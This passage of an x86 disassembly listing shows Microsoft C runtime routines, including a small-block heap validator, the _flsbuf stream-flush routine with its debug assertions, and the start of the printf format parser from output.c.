mov ecx, dword_493768
shr edx, cl
mov eax, dword_493770
mov ecx, [eax+8]
or ecx, edx
mov edx, dword_493770
mov [edx+8], ecx
mov eax, dword_493770
mov ecx, [eax+10h]
mov edx, dword_493768
mov dword ptr [ecx+edx*4+0C4h], 0
mov eax, dword_493770
mov ecx, [eax+10h]
mov dl, [ecx+43h]
sub dl, 1
mov eax, dword_493770
mov ecx, [eax+10h]
mov [ecx+43h], dl
mov edx, dword_493770
mov eax, [edx+10h]
movsx ecx, byte ptr [eax+43h]
test ecx, ecx
jnz short loc_41E0B2
mov edx, dword_493770
mov eax, [edx+4]
and al, 0FEh
mov ecx, dword_493770
mov [ecx+4], eax
loc_41E0B2: ; CODE XREF: .text:0041E09C�j
mov edx, dword_493770
cmp dword ptr [edx+8], 0FFFFFFFFh
jnz short loc_41E122
cmp dword_493774, 1
jle short loc_41E122
mov eax, dword_493770
mov ecx, [eax+10h]
push ecx
push 0
mov edx, dword_49377C
push edx
call ds:dword_494350
mov eax, dword_493774
imul eax, 14h
mov ecx, dword_493778
add ecx, eax
mov edx, dword_493770
add edx, 14h
sub ecx, edx
push ecx
mov eax, dword_493770
add eax, 14h
push eax
mov ecx, dword_493770
push ecx
call sub_426C00
add esp, 0Ch
mov edx, dword_493774
sub edx, 1
mov dword_493774, edx
loc_41E122: ; CODE XREF: .text:0041E0BC�j
; .text:0041E0C5�j
mov dword_493770, 0
loc_41E12C: ; CODE XREF: .text:0041E00B�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E130 proc near ; CODE XREF: sub_41C930+15�p
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 168h
mov eax, dword_493774
imul eax, 14h
push eax
mov ecx, dword_493778
push ecx
call ds:dword_494408
test eax, eax
jz short loc_41E15B
or eax, 0FFFFFFFFh
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E15B: ; CODE XREF: sub_41E130+21�j
mov edx, dword_493778
mov [ebp+var_13C], edx
mov [ebp+var_120], 0
jmp short loc_41E182
; ---------------------------------------------------------------------------
loc_41E173: ; CODE XREF: sub_41E130+612�j
mov eax, [ebp+var_120]
add eax, 1
mov [ebp+var_120], eax
loc_41E182: ; CODE XREF: sub_41E130+41�j
mov ecx, [ebp+var_120]
cmp ecx, dword_493774
jge loc_41E747
mov edx, [ebp+var_13C]
mov eax, [edx+10h]
mov [ebp+var_160], eax
push 41C4h
mov ecx, [ebp+var_160]
push ecx
call ds:dword_494408
test eax, eax
jz short loc_41E1C3
mov eax, 0FFFFFFFEh
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E1C3: ; CODE XREF: sub_41E130+87�j
mov edx, [ebp+var_13C]
mov eax, [edx+0Ch]
mov [ebp+var_128], eax
mov ecx, [ebp+var_160]
add ecx, 144h
mov [ebp+var_18], ecx
mov edx, [ebp+var_13C]
mov eax, [edx+8]
mov [ebp+var_4], eax
mov [ebp+var_144], 0
mov [ebp+var_158], 0
mov [ebp+var_C], 0
jmp short loc_41E213
; ---------------------------------------------------------------------------
loc_41E20A: ; CODE XREF: sub_41E130+5D6�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_41E213: ; CODE XREF: sub_41E130+D8�j
cmp [ebp+var_C], 20h
jge loc_41E70B
mov [ebp+var_11C], 0
mov [ebp+var_150], 0
mov [ebp+var_12C], 0
mov [ebp+var_14C], 0
jmp short loc_41E256
; ---------------------------------------------------------------------------
loc_41E247: ; CODE XREF: sub_41E130+140�j
mov edx, [ebp+var_14C]
add edx, 1
mov [ebp+var_14C], edx
loc_41E256: ; CODE XREF: sub_41E130+115�j
cmp [ebp+var_14C], 40h
jge short loc_41E272
mov eax, [ebp+var_14C]
mov [ebp+eax*4+var_118], 0
jmp short loc_41E247
; ---------------------------------------------------------------------------
loc_41E272: ; CODE XREF: sub_41E130+12D�j
cmp [ebp+var_4], 0
jl loc_41E6AD
push 8000h
mov ecx, [ebp+var_128]
push ecx
call ds:dword_494408
test eax, eax
jz short loc_41E29C
mov eax, 0FFFFFFFCh
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E29C: ; CODE XREF: sub_41E130+160�j
mov edx, [ebp+var_128]
mov [ebp+var_8], edx
mov [ebp+var_140], 0
jmp short loc_41E2C0
; ---------------------------------------------------------------------------
loc_41E2B1: ; CODE XREF: sub_41E130+30F�j
mov eax, [ebp+var_140]
add eax, 1
mov [ebp+var_140], eax
loc_41E2C0: ; CODE XREF: sub_41E130+17F�j
cmp [ebp+var_140], 8
jge loc_41E444
mov ecx, [ebp+var_8]
add ecx, 0Ch
mov [ebp+var_130], ecx
mov edx, [ebp+var_130]
add edx, 0FF0h
mov [ebp+var_138], edx
mov eax, [ebp+var_130]
cmp dword ptr [eax-4], 0FFFFFFFFh
jnz short loc_41E302
mov ecx, [ebp+var_138]
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_41E30C
loc_41E302: ; CODE XREF: sub_41E130+1C5�j
mov eax, 0FFFFFFFBh
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E30C: ; CODE XREF: sub_41E130+1D0�j
; sub_41E130+2E6�j
mov edx, [ebp+var_130]
mov eax, [edx]
mov [ebp+var_148], eax
mov ecx, [ebp+var_148]
mov [ebp+var_154], ecx
mov edx, [ebp+var_154]
and edx, 1
test edx, edx
jz short loc_41E369
mov eax, [ebp+var_148]
sub eax, 1
mov [ebp+var_148], eax
cmp [ebp+var_148], 400h
jle short loc_41E358
mov eax, 0FFFFFFFAh
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E358: ; CODE XREF: sub_41E130+21C�j
mov ecx, [ebp+var_12C]
add ecx, 1
mov [ebp+var_12C], ecx
jmp short loc_41E3AB
; ---------------------------------------------------------------------------
loc_41E369: ; CODE XREF: sub_41E130+201�j
mov edx, [ebp+var_148]
sar edx, 4
sub edx, 1
mov [ebp+var_14C], edx
cmp [ebp+var_14C], 3Fh
jle short loc_41E38E
mov [ebp+var_14C], 3Fh
loc_41E38E: ; CODE XREF: sub_41E130+252�j
mov eax, [ebp+var_14C]
mov ecx, [ebp+eax*4+var_118]
add ecx, 1
mov edx, [ebp+var_14C]
mov [ebp+edx*4+var_118], ecx
loc_41E3AB: ; CODE XREF: sub_41E130+237�j
cmp [ebp+var_148], 10h
jl short loc_41E3CD
mov eax, [ebp+var_148]
and eax, 0Fh
test eax, eax
jnz short loc_41E3CD
cmp [ebp+var_148], 0FF0h
jle short loc_41E3D7
loc_41E3CD: ; CODE XREF: sub_41E130+282�j
; sub_41E130+28F�j
mov eax, 0FFFFFFF9h
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E3D7: ; CODE XREF: sub_41E130+29B�j
mov ecx, [ebp+var_130]
add ecx, [ebp+var_148]
mov edx, [ecx-4]
cmp edx, [ebp+var_154]
jz short loc_41E3F8
mov eax, 0FFFFFFF8h
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E3F8: ; CODE XREF: sub_41E130+2BC�j
mov eax, [ebp+var_130]
add eax, [ebp+var_148]
mov [ebp+var_130], eax
mov ecx, [ebp+var_130]
cmp ecx, [ebp+var_138]
jb loc_41E30C
mov edx, [ebp+var_130]
cmp edx, [ebp+var_138]
jz short loc_41E434
mov eax, 0FFFFFFF8h
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E434: ; CODE XREF: sub_41E130+2F8�j
mov eax, [ebp+var_8]
add eax, 1000h
mov [ebp+var_8], eax
jmp loc_41E2B1
; ---------------------------------------------------------------------------
loc_41E444: ; CODE XREF: sub_41E130+197�j
mov ecx, [ebp+var_18]
mov edx, [ecx]
cmp edx, [ebp+var_12C]
jz short loc_41E45B
mov eax, 0FFFFFFF7h
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E45B: ; CODE XREF: sub_41E130+31F�j
mov eax, [ebp+var_18]
mov [ebp+var_134], eax
mov [ebp+var_14], 0
jmp short loc_41E476
; ---------------------------------------------------------------------------
loc_41E46D: ; CODE XREF: sub_41E130+578�j
mov ecx, [ebp+var_14]
add ecx, 1
mov [ebp+var_14], ecx
loc_41E476: ; CODE XREF: sub_41E130+33B�j
cmp [ebp+var_14], 40h
jge loc_41E6AD
mov [ebp+var_168], 0
mov edx, [ebp+var_134]
mov [ebp+var_130], edx
loc_41E496: ; CODE XREF: sub_41E130+4A5�j
mov eax, [ebp+var_130]
mov ecx, [eax+4]
mov [ebp+var_15C], ecx
mov edx, [ebp+var_15C]
cmp edx, [ebp+var_134]
jz loc_41E5DA
mov eax, [ebp+var_14]
mov ecx, [ebp+var_168]
cmp ecx, [ebp+eax*4+var_118]
jz loc_41E5DA
mov edx, [ebp+var_15C]
cmp edx, [ebp+var_128]
jb short loc_41E4EE
mov eax, [ebp+var_128]
add eax, 8000h
cmp [ebp+var_15C], eax
jb short loc_41E4F8
loc_41E4EE: ; CODE XREF: sub_41E130+3A9�j
mov eax, 0FFFFFFF6h
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E4F8: ; CODE XREF: sub_41E130+3BC�j
mov ecx, [ebp+var_15C]
and ecx, 0FFFFF000h
mov [ebp+var_164], ecx
mov edx, [ebp+var_164]
add edx, 0Ch
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
add eax, 0FF0h
mov [ebp+var_124], eax
loc_41E524: ; CODE XREF: sub_41E130+41C�j
mov ecx, [ebp+var_10]
cmp ecx, [ebp+var_124]
jz short loc_41E54E
mov edx, [ebp+var_10]
cmp edx, [ebp+var_15C]
jnz short loc_41E53C
jmp short loc_41E54E
; ---------------------------------------------------------------------------
loc_41E53C: ; CODE XREF: sub_41E130+408�j
mov eax, [ebp+var_10]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
mov edx, [ebp+var_10]
add edx, ecx
mov [ebp+var_10], edx
jmp short loc_41E524
; ---------------------------------------------------------------------------
loc_41E54E: ; CODE XREF: sub_41E130+3FD�j
; sub_41E130+40A�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_124]
jnz short loc_41E563
mov eax, 0FFFFFFF5h
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E563: ; CODE XREF: sub_41E130+427�j
mov ecx, [ebp+var_15C]
mov edx, [ecx]
sar edx, 4
sub edx, 1
mov [ebp+var_14C], edx
cmp [ebp+var_14C], 3Fh
jle short loc_41E58A
mov [ebp+var_14C], 3Fh
loc_41E58A: ; CODE XREF: sub_41E130+44E�j
mov eax, [ebp+var_14C]
cmp eax, [ebp+var_14]
jz short loc_41E59F
mov eax, 0FFFFFFF4h
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E59F: ; CODE XREF: sub_41E130+463�j
mov ecx, [ebp+var_15C]
mov edx, [ecx+8]
cmp edx, [ebp+var_130]
jz short loc_41E5BA
mov eax, 0FFFFFFF3h
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E5BA: ; CODE XREF: sub_41E130+47E�j
mov eax, [ebp+var_15C]
mov [ebp+var_130], eax
mov ecx, [ebp+var_168]
add ecx, 1
mov [ebp+var_168], ecx
jmp loc_41E496
; ---------------------------------------------------------------------------
loc_41E5DA: ; CODE XREF: sub_41E130+381�j
; sub_41E130+397�j
cmp [ebp+var_168], 0
jz short loc_41E651
cmp [ebp+var_14], 20h
jge short loc_41E61B
mov edx, 80000000h
mov ecx, [ebp+var_14]
shr edx, cl
mov eax, [ebp+var_11C]
or eax, edx
mov [ebp+var_11C], eax
mov edx, 80000000h
mov ecx, [ebp+var_14]
shr edx, cl
mov eax, [ebp+var_144]
or eax, edx
mov [ebp+var_144], eax
jmp short loc_41E651
; ---------------------------------------------------------------------------
loc_41E61B: ; CODE XREF: sub_41E130+4B7�j
mov ecx, [ebp+var_14]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+var_150]
or eax, edx
mov [ebp+var_150], eax
mov ecx, [ebp+var_14]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+var_158]
or eax, edx
mov [ebp+var_158], eax
loc_41E651: ; CODE XREF: sub_41E130+4B1�j
; sub_41E130+4E9�j
mov ecx, [ebp+var_130]
mov edx, [ecx+4]
cmp edx, [ebp+var_134]
jnz short loc_41E674
mov eax, [ebp+var_14]
mov ecx, [ebp+var_168]
cmp ecx, [ebp+eax*4+var_118]
jz short loc_41E67E
loc_41E674: ; CODE XREF: sub_41E130+530�j
mov eax, 0FFFFFFF2h
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E67E: ; CODE XREF: sub_41E130+542�j
mov edx, [ebp+var_134]
mov eax, [edx+8]
cmp eax, [ebp+var_130]
jz short loc_41E699
mov eax, 0FFFFFFF1h
jmp loc_41E749
; ---------------------------------------------------------------------------
loc_41E699: ; CODE XREF: sub_41E130+55D�j
mov ecx, [ebp+var_134]
add ecx, 8
mov [ebp+var_134], ecx
jmp loc_41E46D
; ---------------------------------------------------------------------------
loc_41E6AD: ; CODE XREF: sub_41E130+146�j
; sub_41E130+34A�j
mov edx, [ebp+var_C]
mov eax, [ebp+var_160]
mov ecx, [ebp+var_11C]
cmp ecx, [eax+edx*4+44h]
jnz short loc_41E6DA
mov edx, [ebp+var_C]
mov eax, [ebp+var_160]
mov ecx, [ebp+var_150]
cmp ecx, [eax+edx*4+0C4h]
jz short loc_41E6E1
loc_41E6DA: ; CODE XREF: sub_41E130+590�j
mov eax, 0FFFFFFF0h
jmp short loc_41E749
; ---------------------------------------------------------------------------
loc_41E6E1: ; CODE XREF: sub_41E130+5A8�j
mov edx, [ebp+var_128]
add edx, 8000h
mov [ebp+var_128], edx
mov eax, [ebp+var_18]
add eax, 204h
mov [ebp+var_18], eax
mov ecx, [ebp+var_4]
shl ecx, 1
mov [ebp+var_4], ecx
jmp loc_41E20A
; ---------------------------------------------------------------------------
loc_41E70B: ; CODE XREF: sub_41E130+E7�j
mov edx, [ebp+var_13C]
mov eax, [ebp+var_144]
cmp eax, [edx]
jnz short loc_41E72C
mov ecx, [ebp+var_13C]
mov edx, [ebp+var_158]
cmp edx, [ecx+4]
jz short loc_41E733
loc_41E72C: ; CODE XREF: sub_41E130+5E9�j
mov eax, 0FFFFFFEFh
jmp short loc_41E749
; ---------------------------------------------------------------------------
loc_41E733: ; CODE XREF: sub_41E130+5FA�j
mov eax, [ebp+var_13C]
add eax, 14h
mov [ebp+var_13C], eax
jmp loc_41E173
; ---------------------------------------------------------------------------
loc_41E747: ; CODE XREF: sub_41E130+5E�j
xor eax, eax
loc_41E749: ; CODE XREF: sub_41E130+26�j
; sub_41E130+8E�j ...
mov esp, ebp
pop ebp
retn
sub_41E130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E750 proc near ; CODE XREF: sub_418730+66�p
; sub_4194F0+19�p ...
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 1
cmp eax, 100h
ja short loc_41E77A
mov ecx, [ebp+arg_0]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, [ebp+arg_4]
jmp loc_41E803
; ---------------------------------------------------------------------------
loc_41E77A: ; CODE XREF: sub_41E750+11�j
mov ecx, [ebp+arg_0]
sar ecx, 8
and ecx, 0FFh
and ecx, 0FFh
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 8000h
test eax, eax
jz short loc_41E7C3
mov ecx, [ebp+arg_0]
sar ecx, 8
and ecx, 0FFh
mov [ebp+var_C], cl
mov dl, byte ptr [ebp+arg_0]
mov [ebp+var_B], dl
mov [ebp+var_A], 0
mov [ebp+var_8], 2
jmp short loc_41E7D4
; ---------------------------------------------------------------------------
loc_41E7C3: ; CODE XREF: sub_41E750+4F�j
mov al, byte ptr [ebp+arg_0]
mov [ebp+var_C], al
mov [ebp+var_B], 0
mov [ebp+var_8], 1
loc_41E7D4: ; CODE XREF: sub_41E750+71�j
push 1
push 0
push 0
lea ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_8]
push edx
lea eax, [ebp+var_C]
push eax
push 1
call sub_426F40
add esp, 1Ch
test eax, eax
jnz short loc_41E7F8
xor eax, eax
jmp short loc_41E803
; ---------------------------------------------------------------------------
loc_41E7F8: ; CODE XREF: sub_41E750+A2�j
mov eax, [ebp+var_4]
and eax, 0FFFFh
and eax, [ebp+arg_4]
loc_41E803: ; CODE XREF: sub_41E750+25�j
; sub_41E750+A6�j
mov esp, ebp
pop ebp
retn
sub_41E750 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E810 proc near ; CODE XREF: sub_418D70+E5�p
; sub_418EF0+E4�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
loc_41E819: ; CODE XREF: sub_41E810+31�j
cmp [ebp+arg_4], 0
jnz short loc_41E83D
push offset aStrNull ; "str != NULL"
push 0
push 69h
push offset a_flsbuf_c ; "_flsbuf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41E83D
int 3 ; Trap to Debugger
loc_41E83D: ; CODE XREF: sub_41E810+D�j
; sub_41E810+2A�j
xor eax, eax
test eax, eax
jnz short loc_41E819
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
mov eax, [edx+10h]
mov [ebp+var_10], eax
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 82h
test edx, edx
jz short loc_41E86F
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
and ecx, 40h
test ecx, ecx
jz short loc_41E885
loc_41E86F: ; CODE XREF: sub_41E810+50�j
mov edx, [ebp+var_8]
mov eax, [edx+0Ch]
or al, 20h
mov ecx, [ebp+var_8]
mov [ecx+0Ch], eax
or eax, 0FFFFFFFFh
jmp loc_41EA7D
; ---------------------------------------------------------------------------
loc_41E885: ; CODE XREF: sub_41E810+5D�j
mov edx, [ebp+var_8]
mov eax, [edx+0Ch]
and eax, 1
test eax, eax
jz short loc_41E8DC
mov ecx, [ebp+var_8]
mov dword ptr [ecx+4], 0
mov edx, [ebp+var_8]
mov eax, [edx+0Ch]
and eax, 10h
test eax, eax
jz short loc_41E8C5
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
mov eax, [edx+8]
mov [ecx], eax
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 0FFFFFFFEh
mov eax, [ebp+var_8]
mov [eax+0Ch], edx
jmp short loc_41E8DC
; ---------------------------------------------------------------------------
loc_41E8C5: ; CODE XREF: sub_41E810+97�j
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
or edx, 20h
mov eax, [ebp+var_8]
mov [eax+0Ch], edx
or eax, 0FFFFFFFFh
jmp loc_41EA7D
; ---------------------------------------------------------------------------
loc_41E8DC: ; CODE XREF: sub_41E810+80�j
; sub_41E810+B3�j
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
or edx, 2
mov eax, [ebp+var_8]
mov [eax+0Ch], edx
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 0FFFFFFEFh
mov eax, [ebp+var_8]
mov [eax+0Ch], edx
mov ecx, [ebp+var_8]
mov dword ptr [ecx+4], 0
mov [ebp+var_4], 0
mov edx, [ebp+var_4]
mov [ebp+var_C], edx
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
and ecx, 10Ch
test ecx, ecx
jnz short loc_41E94F
cmp [ebp+var_8], offset dword_442FA0
jz short loc_41E933
cmp [ebp+var_8], offset dword_442FC0
jnz short loc_41E943
loc_41E933: ; CODE XREF: sub_41E810+118�j
mov edx, [ebp+var_10]
push edx
call sub_4271D0
add esp, 4
test eax, eax
jnz short loc_41E94F
loc_41E943: ; CODE XREF: sub_41E810+121�j
mov eax, [ebp+var_8]
push eax
call sub_427100
add esp, 4
loc_41E94F: ; CODE XREF: sub_41E810+10F�j
; sub_41E810+131�j
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 108h
test edx, edx
jz loc_41EA3B
loc_41E963: ; CODE XREF: sub_41E810+187�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_8]
mov edx, [eax]
sub edx, [ecx+8]
test edx, edx
jge short loc_41E993
push offset aInconsistentIo ; "(\"inconsistent IOB fields\", stream->_pt"...
push 0
push 0A0h
push offset a_flsbuf_c ; "_flsbuf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41E993
int 3 ; Trap to Debugger
loc_41E993: ; CODE XREF: sub_41E810+160�j
; sub_41E810+180�j
xor eax, eax
test eax, eax
jnz short loc_41E963
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
mov eax, [ecx]
sub eax, [edx+8]
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+var_8]
mov [eax], edx
mov ecx, [ebp+var_8]
mov edx, [ecx+18h]
sub edx, 1
mov eax, [ebp+var_8]
mov [eax+4], edx
cmp [ebp+var_4], 0
jle short loc_41E9E6
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx+8]
push eax
mov ecx, [ebp+var_10]
push ecx
call sub_422370
add esp, 0Ch
mov [ebp+var_C], eax
jmp short loc_41EA2E
; ---------------------------------------------------------------------------
loc_41E9E6: ; CODE XREF: sub_41E810+1B8�j
cmp [ebp+var_10], 0FFFFFFFFh
jz short loc_41EA09
mov edx, [ebp+var_10]
sar edx, 5
mov eax, [ebp+var_10]
and eax, 1Fh
imul eax, 24h
mov ecx, dword_492420[edx*4]
add ecx, eax
mov [ebp+var_14], ecx
jmp short loc_41EA10
; ---------------------------------------------------------------------------
loc_41EA09: ; CODE XREF: sub_41E810+1DA�j
mov [ebp+var_14], offset dword_443658
loc_41EA10: ; CODE XREF: sub_41E810+1F7�j
mov edx, [ebp+var_14]
movsx eax, byte ptr [edx+4]
and eax, 20h
test eax, eax
jz short loc_41EA2E
push 2
push 0
mov ecx, [ebp+var_10]
push ecx
call sub_424B00
add esp, 0Ch
loc_41EA2E: ; CODE XREF: sub_41E810+1D4�j
; sub_41E810+20C�j
mov edx, [ebp+var_8]
mov eax, [edx+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_41EA59
; ---------------------------------------------------------------------------
loc_41EA3B: ; CODE XREF: sub_41E810+14D�j
mov [ebp+var_4], 1
mov edx, [ebp+var_4]
push edx
lea eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_10]
push ecx
call sub_422370
add esp, 0Ch
mov [ebp+var_C], eax
loc_41EA59: ; CODE XREF: sub_41E810+229�j
mov edx, [ebp+var_C]
cmp edx, [ebp+var_4]
jz short loc_41EA75
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
or ecx, 20h
mov edx, [ebp+var_8]
mov [edx+0Ch], ecx
or eax, 0FFFFFFFFh
jmp short loc_41EA7D
; ---------------------------------------------------------------------------
loc_41EA75: ; CODE XREF: sub_41E810+24F�j
mov eax, [ebp+arg_0]
and eax, 0FFh
loc_41EA7D: ; CODE XREF: sub_41E810+70�j
; sub_41E810+C7�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41E810 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA90 proc near ; CODE XREF: sub_418D70+9A�p
; sub_418EF0+99�p ...
var_2A6 = word ptr -2A6h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = byte ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = word ptr -248h
var_244 = dword ptr -244h
var_240 = byte ptr -240h
var_23F = byte ptr -23Fh
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = byte ptr -228h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2A8h
push ebx
push esi
push edi
mov [ebp+var_24], 0
mov [ebp+var_22C], 0
mov [ebp+var_18], 0
loc_41EAB4: ; CODE XREF: sub_41EA90:loc_41F6A2�j
mov eax, [ebp+arg_4]
mov cl, [eax]
mov byte ptr [ebp+var_28], cl
movsx edx, byte ptr [ebp+var_28]
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
test edx, edx
jz loc_41F6A7
cmp [ebp+var_22C], 0
jl loc_41F6A7
movsx ecx, byte ptr [ebp+var_28]
cmp ecx, 20h
jl short loc_41EB06
movsx edx, byte ptr [ebp+var_28]
cmp edx, 78h
jg short loc_41EB06
movsx eax, byte ptr [ebp+var_28]
movsx ecx, byte ptr [eax+432EC8h]
and ecx, 0Fh
mov [ebp+var_290], ecx
jmp short loc_41EB10
; ---------------------------------------------------------------------------
loc_41EB06: ; CODE XREF: sub_41EA90+55�j
; sub_41EA90+5E�j
mov [ebp+var_290], 0
loc_41EB10: ; CODE XREF: sub_41EA90+74�j
mov edx, [ebp+var_290]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_18]
movsx edx, ds:byte_432EE8[ecx+eax*8]
sar edx, 4
mov [ebp+var_18], edx
mov eax, [ebp+var_18]
mov [ebp+var_294], eax
cmp [ebp+var_294], 7
ja loc_41F6A2
mov ecx, [ebp+var_294]
jmp ds:off_41F6B4[ecx*4]
loc_41EB50: ; CODE XREF: sub_41EA90+332�j
; DATA XREF: .text:off_41F6B4�o
mov [ebp+var_1C], 0
mov edx, [ebp+var_28]
and edx, 0FFh
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8000h
test ecx, ecx
jz short loc_41EBCD
lea edx, [ebp+var_22C]
push edx
mov eax, [ebp+arg_0]
push eax
movsx ecx, byte ptr [ebp+var_28]
push ecx
call sub_41F7C0
add esp, 0Ch
mov edx, [ebp+arg_4]
mov al, [edx]
mov byte ptr [ebp+var_28], al
mov ecx, [ebp+arg_4]
add ecx, 1
mov [ebp+arg_4], ecx
loc_41EB9E: ; CODE XREF: sub_41EA90+13B�j
movsx edx, byte ptr [ebp+var_28]
test edx, edx
jnz short loc_41EBC7
push offset aCh_t0 ; "ch != _T('\\0')"
push 0
push 186h
push offset aOutput_c ; "output.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41EBC7
int 3 ; Trap to Debugger
loc_41EBC7: ; CODE XREF: sub_41EA90+114�j
; sub_41EA90+134�j
xor eax, eax
test eax, eax
jnz short loc_41EB9E
loc_41EBCD: ; CODE XREF: sub_41EA90+E3�j
lea ecx, [ebp+var_22C]
push ecx
mov edx, [ebp+arg_0]
push edx
movsx eax, byte ptr [ebp+var_28]
push eax
call sub_41F7C0
add esp, 0Ch
jmp loc_41F6A2
; ---------------------------------------------------------------------------
loc_41EBEA: ; CODE XREF: sub_41EA90+B9�j
; DATA XREF: .text:0041F6B8�o
mov [ebp+var_8], 0
mov ecx, [ebp+var_8]
mov [ebp+var_23C], ecx
mov edx, [ebp+var_23C]
mov [ebp+var_244], edx
mov eax, [ebp+var_244]
mov [ebp+var_10], eax
mov [ebp+var_4], 0
mov [ebp+var_234], 0FFFFFFFFh
mov [ebp+var_1C], 0
jmp loc_41F6A2
; ---------------------------------------------------------------------------
loc_41EC2C: ; CODE XREF: sub_41EA90+B9�j
; DATA XREF: .text:0041F6BC�o
movsx ecx, byte ptr [ebp+var_28]
mov [ebp+var_298], ecx
mov edx, [ebp+var_298]
sub edx, 20h
mov [ebp+var_298], edx
cmp [ebp+var_298], 10h
